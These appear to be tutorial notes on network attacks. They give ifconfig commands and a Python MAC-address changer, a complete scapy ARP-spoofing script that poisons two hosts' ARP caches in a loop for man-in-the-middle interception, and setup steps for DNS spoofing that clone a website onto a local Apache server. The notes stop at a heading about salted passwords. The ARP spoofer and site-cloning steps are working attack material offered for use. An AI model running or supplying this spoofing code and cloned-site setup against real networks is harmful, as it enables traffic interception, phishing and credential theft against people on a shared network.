Sniffers, Flooders and Spoofers

MAC address modifier

Linux has already a tool -> macchanger --help

Also:

1. ifconfig eth0 down

2. ifconfig

3. ifconfig eth0 hw ether AA:BB:CC:DD:EE:FF

4. ifconfig eth0 up

5. ifconfig

#!/usr/bin/python
# RUN AS ROOT

import subprocess

def change_mac_address(interface,mac):
        subprocess.call(["ifconfig",interface,"down"])
        subprocess.call(["ifconfig",interface,"hw","ether",mac])
        subprocess.call(["ifconfig",interface,"up"])

def main():
        interface = str(input("[*] Enter interface to change MAC address on: "))
        new_mac_address = input("[*] Enter MAC address to change to: ")

        before_change = subprocess.check_output(["ifconfig",interface])
        change_mac_address(interface,new_mac_address)
        after_change = subprocess.check_output(["ifconfig",interface])

        if before_change == after_change:
                print("[!!] Failed to change MAC address to: " + new_mac_address)
        else:
                print("[+] MAC address changed to: " + new_mac_address + " on interface " + interface)

main()

MAC Spoofer

#!/usr/bin/python
# RUN AS ROOT
import scapy.all as scapy

def restore(destination_ip, source_ip):
        target_mac = get_target_mac(destination_ip)
        source_mac = get_target_mac(source_ip)
        packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=target_mac, psrc=source_ip, hwsrc=source_mac)
        scapy.send(packet, verbose=False)

def get_target_mac(ip):
        arp_request = scapy.ARP(pdst=ip)
        broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
        finalpacket = broadcast/arp_request
        answer = scapy.srp(finalpacket, timeout=2, verbose=False)[0]
        mac = answer[0][1].hwsrc
        return(mac)

def spoof_arp(target_ip, spoofed_ip):
        mac = get_target_mac(target_ip)
        packet = scapy.ARP(op=2, hwdst=mac, pdst=target_ip, psrc=spoofed_ip)
        scapy.send(packet, verbose=False)

def main():
        target_ip = input("[*] Introduce the target IP: ")
        spoofed_ip = input("[*] Introduce the spoofed IP: ")

        try:
                while True:
                        spoof_arp(target_ip,spoofed_ip)
                        spoof_arp(spoofed_ip,target_ip)

        except KeyboardInterrupt:
                restore(target_ip,spoofed_ip)
                restore(spoofed_ip,target_ip)
                exit(0)

main()

DNS Spoofer

Previous steps:

1. service apache2 start

2. Clone website (go to main page, right click and save as)

3. Move the files downloaded to /var/www/html

4. Remove the items there and substitute the main page downloaded for "index.html"

Crypt passwords with Salt